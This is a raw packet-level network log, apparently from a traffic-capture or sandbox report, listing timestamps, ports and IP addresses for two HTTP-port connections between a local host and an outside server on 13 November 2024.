                                                                                      Nov 13, 2024 09:28:57.146652937 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.146838903 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175235987 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175254107 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175270081 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175354958 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175370932 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175385952 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.175614119 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.175615072 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184251070 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184325933 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184416056 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184429884 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184444904 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184461117 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184475899 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.184480906 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.184514999 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.238044977 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261724949 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261739969 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261754990 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261779070 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261791945 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261806965 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.261948109 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261949062 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261949062 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.261974096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262053013 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262068033 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262197018 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262212038 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262259960 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262259960 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262347937 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262363911 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262423992 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262485981 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262501001 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262542009 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:57.262681007 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262696028 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:57.262737036 CET5911680192.168.2.438.47.237.27
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 13, 2024 09:28:57.262834072 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.262850046 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.262890100 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.262969971 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263024092 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263046980 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263062954 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263077974 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263093948 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263115883 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263148069 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263405085 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263417959 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263473034 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263550043 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263566971 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263581991 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263617039 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263822079 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263838053 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263851881 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263865948 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263879061 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263881922 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263897896 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263901949 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263915062 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.263943911 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.263978004 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.264391899 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264466047 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264520884 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.264564991 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264580011 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264595032 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264631987 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.264849901 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264872074 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264887094 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264902115 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264905930 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.264919043 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264930010 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.264934063 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264945030 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.264983892 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.265013933 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.265434980 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265451908 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265510082 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.265656948 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265671968 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265686989 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265727043 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.265939951 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265954971 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265969992 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265985012 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.265995026 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.266000986 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.266017914 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.266020060 CET  80           59116      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:57.266060114 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.266086102 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:57.753952026 CET  59116        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:58.776102066 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:58.781359911 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:58.781610966 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:58.799527884 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:58.805641890 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451735020 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451761961 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451769114 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451781034 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451860905 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451867104 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451941967 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451961040 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.451972961 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.452073097 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.452166080 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.452316999 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.457120895 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.457273960 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.457290888 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.457308054 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.457326889 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.457360029 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.484185934 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.484214067 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.484456062 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.570593119 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570610046 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570626020 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570641041 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570702076 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.570727110 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570792913 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.570832014 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570887089 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.570931911 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570949078 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570962906 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.570995092 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.571584940 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.571636915 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.571960926 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.571978092 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572022915 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.572073936 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572089911 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572103977 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572138071 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.572658062 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572709084 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.572742939 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572758913 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.572807074 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.572889090 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.573477030 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.573524952 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.602910042 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.602941990 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.602957010 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.602972031 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.602987051 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.603126049 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.688926935 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.688955069 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.688970089 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689022064 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.689088106 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689109087 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689145088 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.689233065 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689281940 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.689385891 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689440966 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689455986 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689471960 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.689487934 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.689522982 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.689718008 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690048933 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690083027 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690099001 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690099955 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.690145969 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.690432072 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690448046 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690463066 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690491915 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.690555096 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690598965 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.690885067 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690922976 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690939903 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.690967083 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.691063881 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691107988 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691108942 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.691124916 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691164970 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.691785097 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691819906 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691837072 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691870928 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.691937923 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691955090 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691970110 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.691998959 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.692045927 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.692599058 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692650080 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692667961 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692698002 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.692785025 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692831039 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.692838907 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692856073 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.692899942 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.693443060 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.693505049 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.693521976 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.693553925 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.693674088 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.693690062 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.693722010 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.721728086 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721782923 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721797943 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721818924 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.721894026 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.721910954 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721927881 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721945047 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721962929 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.721972942 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.722003937 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.722348928 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.722426891 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.722440004 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.722454071 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.722466946 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.722475052 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.722512007 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.769220114 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.807534933 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807590961 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807605982 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807663918 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.807749033 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807794094 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.807825089 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807840109 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.807924986 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808007002 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808022022 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808036089 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808051109 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808058977 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808090925 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808301926 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808362007 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808378935 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808392048 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808402061 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808407068 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808444023 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808782101 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808806896 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808820963 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.808845043 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808866024 CET  59117        80         192.168.2.4   38.47.237.27
Nov 13, 2024 09:28:59.808988094 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.809003115 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.809017897 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.809034109 CET  80           59117      38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:59.809043884 CET  59117        80         192.168.2.4   38.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809077978 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809415102 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809431076 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809446096 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809473038 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809480906 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809497118 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809511900 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809521914 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809530020 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809556007 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809890032 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809906006 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809922934 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.809935093 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.809966087 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810091019 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810106039 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810122013 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810167074 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810359955 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810374975 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810389042 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810403109 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810404062 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810415030 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810429096 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810445070 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.810451031 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810487032 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.810945034 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811127901 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811142921 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811156988 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811172009 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811176062 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811187983 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811192036 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811204910 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811220884 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811230898 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811235905 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811253071 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811280012 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811311007 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811834097 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811851025 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.811892986 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.811969042 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812019110 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812036037 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812060118 CET5911780192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:59.812249899 CET805911738.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:59.812311888 CET5911780192.168.2.438.47.237.27
